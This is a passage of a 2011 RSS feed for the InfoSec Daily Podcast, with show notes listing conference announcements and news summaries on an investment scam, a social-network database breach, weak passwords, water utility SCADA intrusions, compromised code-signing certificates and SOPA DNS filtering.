	<span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; "><br class="kix-line-break" /><br />
	</span><a href="http://occupyflash.org/"><span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 153); background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">http://occupyflash.org/</span></a></p>
<p>	<a href="http://www.forbes.com/sites/bruceupbin/2011/11/15/researchers-show-how-easy-it-is-to-infiltrate-facebook/"><span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 153); background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">http://www.forbes.com/sites/bruceupbin/2011/11/15/researchers-show-how-easy-it-is-to-infiltrate-facebook/</span></a></p>
<p>	<a href="http://news.cnet.com/8301-17938_105-57327665-1/world-toilet-day-lets-have-a-sanitation-celebration"><span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 153); background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">http://news.cnet.com/8301-17938_105-57327665-1/world-toilet-day-lets-have-a-sanitation-celebration</span></a></div>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-527-weekend-wrap-up-with-dr-b0n3z/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3175/0/infosec-daily-podcast-episode-527.mp3" length="55841703" type="audio/mpeg" />
		<itunes:duration>0:38:47</itunes:duration>
		<itunes:subtitle>Episode 527 &#8211; Weekend Wrap-up with Dr. B0n3z
InfoSec Daily Podcast Episode 527 for November 19, 2011. &#160;Tonight&#39;s podcast is hosted by Dr. B0n3z, &#38; Boris Sverdlik.
	Guests: hackett, aricon, &#38; spridel.
	Announcements:
	SANS Ment[...]</itunes:subtitle>
		<itunes:summary>Episode 527 &#8211; Weekend Wrap-up with Dr. B0n3z
InfoSec Daily Podcast Episode 527 for November 19, 2011. &#160;Tonight&#39;s podcast is hosted by Dr. B0n3z, &#38; Boris Sverdlik.
	Guests: hackett, aricon, &#38; spridel.
	Announcements:
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic 
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	DerbyCon 2012 &#8211; &#34;The Reunion&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com

	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source: https://www.infosecisland.com/security-videos-view/17944-Definition-of-a-Real-Security-Consultant.html
	http://www.tgdaily.com/security-features/59737-hackers-destroy-water-pump-in-scada-attack
	
	http://edition.cnn.com/2011/11/18/world/asia/afghanistan-twitter-war/index.html
	http://www.theregister.co.uk/2011/11/17/us_military_cyberspace/
	
	http://www.extremetech.com/computing/105931-full-disk-encryption-is-too-good-says-us-intelligence-agency
	http://packetstormsecurity.org/news/view/20202/Norweigian-Oil-And-Defense-Industries-Are-Hit-By-A-Major-Cyber-Attack.html
	
	http://occupyflash.org/
	http://www.forbes.com/sites/bruceupbin/2011/11/15/researchers-show-how-easy-it-is-to-infiltrate-facebook/
	http://news.cnet.com/8301-17938_105-57327665-1/world-toilet-day-lets-have-a-sanitation-celebration</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 526 &#8211; pre-IPO Bust, Who Is Michael?!?, FindFriendz.com, Water Plants Attacked, Compromised Certs &amp; SOPA</title>
		<link>http://www.isdpodcast.com/episode-526-pre-ipo-bust-who-is-michael-findfriendz-com-water-plants-attacked-compromised-certs-sopa</link>
		<comments>http://www.isdpodcast.com/episode-526-pre-ipo-bust-who-is-michael-findfriendz-com-water-plants-attacked-compromised-certs-sopa#comments</comments>
		<pubDate>Sat, 19 Nov 2011 01:55:57 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3171</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 526 for November 18, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Geordy Rostad. Announcements: Brad Smith (theNurse) and his stroke at Hacker Halted: We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 526 for November 18, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Geordy Rostad.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse) and his stroke at Hacker Halted:</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Vote For Wim Remes</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 16, 2011</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: ISC2</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Who: CISSP&rsquo;s</span><br />
	<a href="http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;The Reunion&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.theregister.co.uk/2011/11/18/pre_ipo_share_scam_facebook_twitter/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2011/11/18/pre_ipo_share_scam_facebook_twitter/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The US Securities and Exchange Commission has closed down an investment scam that was touting pre-IPO shares in Facebook, Twitter, Zynga and Groupon.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The SEC alleges that Florida resident John Mattera and others set up a new hedge fund named The Praetorian Global Fund. The Commission alleged that the suspects had claimed to potential investors that they, and other entities, had tens of millions of dollars worth of shares in the tech firms before their initial public offering.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Mattera and his partners Brad Van Siclen, David Howard, Joseph Almazon and John Arnold, allegedly encouraged the investors to part with their cash to be put into an escrow fund to purchase the shares when the time came, and the SEC said they had managed to bag $12m from investors all over the US in the last 15 months.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to the SEC, none of the individuals ever had any shares in the companies, which also included firms like Bloom Energy and Fisker Auto. The money that was supposed to be going into escrow was actually just going into the personal accounts of Mattera and Arnold, the SEC said.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Commission asserted that after Arnold had taken his cut, Mattera then grabbed the rest of the dosh to &quot;afford his lavish personal expenses&quot; and to pay the rest of the gang.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;By conjuring up a seemingly prestigious hedge fund and touting the safety of an escrow agent, these men exploited investors&rsquo; desire to get an inside track on a wave of hyped future IPOs,&rdquo; George Canellos, director of the SEC&rsquo;s New York office, said in a canned statement.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Even as investors believed their funds were sitting safely in escrow accounts, Mattera plundered those accounts to bankroll a lifestyle of private jets, luxury cars, and fine art.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The US attorney&#39;s office for the southern district of New York, which was carrying on a parallel investigation, has now filed criminal charges against Mattera and arrested him.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The SEC is now looking for the courts to freeze the assets of all five men and eight different corporate entities listed in the</span><a href="http://www.sec.gov/litigation/complaints/2011/comp22160.pdf"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">complaint (PDF)</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source(s): &nbsp;</span><a href="http://datalossdb.org/incidents/4985-57-721-usernames-and-clear-text-passwords-acquired-by-hacker-and-posted-on-internet"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://datalossdb.org/incidents/4985-57-721-usernames-and-clear-text-passwords-acquired-by-hacker-and-posted-on-internet</span></a><br />
	<a href="http://www.ehackingnews.com/2011/11/social-network-site-findfriendzcom.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.ehackingnews.com/2011/11/social-network-site-findfriendzcom.html</span></a><br />
	<a href="http://pastebin.com/uqwXcN1F"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://pastebin.com/uqwXcN1F</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Member of t34m t!g3R Hackers team,An0nym0us sn3Ak3r hacked the social networking site FindFriendz.com using the SQL injection vulnerability(one of the top web application vulnerability). </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">He compromised the 57000+ users data includes username and password. &nbsp;He leaked the part of database in pastebin.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Pastebin leak: </span><a href="http://pastebin.com/uqwXcN1F"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://pastebin.com/uqwXcN1F</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://mashable.com/2011/11/17/worst-internet-passwords/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://mashable.com/2011/11/17/worst-internet-passwords/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Pro tip: choosing &ldquo;password&rdquo; as your online password is not a good idea. In fact, unless you&rsquo;re hoping to be an easy target for hackers, it&rsquo;s the worst password you can possibly choose.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Password&rdquo; ranks first on password management application provider SplashData&rsquo;s annual list of worst internet passwords, which are ordered by how common they are. (&ldquo;Passw0rd,&rdquo; with a numeral zero, isn&rsquo;t much smarter, ranking 18th on the list.)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The list is somewhat predictable: Sequences of adjacent numbers or letters on the keyboard, such as &ldquo;qwerty&rdquo; and &ldquo;123456,&rdquo; and popular names, such as &ldquo;ashley&rdquo; and &ldquo;michael,&rdquo; all are common choices. Other common choices, such as &ldquo;monkey&rdquo; and &ldquo;shadow,&rdquo; are harder to explain. </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Extra Bonus</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: Idiots on twitter have been giving away passwords left and right all day &#8211; </span><a href="https://twitter.com/#%21/search?q=%23worstpassword"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://twitter.com/#!/search?q=%23worstpassword</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://www.infoworld.com/t/network-security/us-water-plants-reportedly-hit-cyber-attacks-179456"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.infoworld.com/t/network-security/us-water-plants-reportedly-hit-cyber-attacks-179456</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In separate incidents, hackers allegedly caused a water pump failure at an Illinois utility and showed off purported access to water supply systems for South Houston, NV.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Two events this week may change that perception.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">On Thursday, a control-systems expert</span><a href="http://community.controlglobal.com/content/water-system-hack-%E2%80%93-system-broken"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">released details of an intrusion</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> into a utility company&#39;s control network that lasted at least two months and resulted in damage to a water pump. In a statement, the U.S. Department of Homeland Security inadvertently identified the location of the utility company as Springfield, Ill. </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;This isn&#39;t hypothetical any more, where people write about what could and what may happen,&quot; said Joseph Weiss, a managing partner at Applied Control Solutions and the person who released details from the report. &quot;This keeps going back to what somebody has done. We don&#39;t know what is going on and there is no guidance out there yet. The concern is how many others have been compromised.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">However, City Water, Light &amp; Power, the utility provider for the city, denied that it was the target of the attack. &quot;Various reports have falsely identified City Water, Light and Power in Springfield, Ill., as having experienced a cyber security breach,&quot; the company said in a statement. &quot;CWLP has not had any breach of its Water or Electric Department supervisory control and data acquisition (SCADA) systems.&quot; SCADA is the computer control network that operates various systems at the utility.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Whether or not CWLP is the breached utility firm, attacks on critical-infrastructure companies appear to be a trend. Today, a hacker posted images and details purportedly from the systems that control the water supply for the city of South Houston, Texas. A series of five images shows the various water levels at different pumping stations and appears to indicate the user has the ability to enable and disable equipment.</span><br />
	<img height="300px;" src="https://lh5.googleusercontent.com/WFLXt0BW9rTXVk4YcFpifSz_Ozlmvj7yrKU1Wt8jyQocl9D_wXvWlURSoo9Hh_vysne4k7iJRyzPiWhtvIghkVWCkj9Hx1cb7t7R3RP-L0Kn-w-zxtI" width="400px;" /></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.h-online.com/security/news/item/Compromised-certificates-Revocations-alone-are-insufficient-1381001.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.h-online.com/security/news/item/Compromised-certificates-Revocations-alone-are-insufficient-1381001.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Revoking a digital certificate does not automatically invalidate, for instance, software signatures that have been made with this certificate. What matters is the revocation date, which determines the point in time after which a signature will no longer be validated.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to a</span><a href="http://blogs.norman.com/2011/malware-detection-team/invisible-ynk-a-code-signing-conundrum"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">report</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> from anti-virus specialist</span><a href="http://www.norman.com/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Norman</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, the signatures of several recently discovered trojans were validated by Windows as a result, and no warning was issued before installing the malware. The trojans were signed with a key that had been stolen from a Japanese company. The corresponding certificate was reported as compromised on 29 July 2011 and revoked by its issuing Certificate Authority (CA), VeriSign, which is now part of Symantec. However, that date was also entered as the revocation date.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unfortunately, the trojans were signed with the key on 13 April 2010, 3 July 2010, and 22 January 2011 &ndash; long before the revocation date. Because of this, the signature code remained valid for the older signatures, and systems would only invalidate signatures that were made after the revocation date.</span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.techdirt.com/articles/20111118/03163416812/sandia-national-labs-dns-filtering-sopapipa-wont-stop-piracy-will-hurt-online-security.shtml"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.techdirt.com/articles/20111118/03163416812/sandia-national-labs-dns-filtering-sopapipa-wont-stop-piracy-will-hurt-online-security.shtml</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Sandia National Labs: DNS Filtering In SOPA/PIPA Won&#39;t Stop Piracy, But Will Hurt Online Security from the </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">more-experts-weigh-in</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> dept</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We&#39;ve covered at great length the problems with DNS filtering in SOPA and PROTECT IP (PIPA) and how it will harm internet security. These concerns were first highlighted by a group of folks who are considered to be some of the foremost experts (and original architects) on DNS. The MPAA and other SOPA/PIPA startups have been trying for months to diminish these points, but have yet to find any kind of argument that makes sense. The argument they fall back on is &quot;well, if this law breaks DNSSEC, just change the code and fix it.&quot; This represents a fundamental misunderstanding of the technoloy. That&#39;s not too surprising, coming from the MPAA, frankly. However, now, Sandia National Labs, which is a part of the Department of Energy, has sent a letter to Rep. Zoe Lofgren confirming most of the problems with the idea of DNS filtering, noting that it would make the internet less secure&#8230; and would do nothing to actually stop piracy.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">It is not likely DNS filtering would be effective in blocking U.S. access to targeted foreign websites&#8230;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">On the question of DNSSEC, the letter notes that slowing the adoption of DNSSEC would have significant &quot;negative consequences&quot; for US online security. While DNSSEC may not be fully rolled out yet, nearly everyone who understands this stuff knows that it&#39;s needed to fix key flaws in DNS. And while it takes time, simply breaking it and waiting for the next generation to rewrite it from scratch would be a mistake. Many years of careful work has gone into DNSSEC. Scrapping it for something else random is not going to help.</span></p>
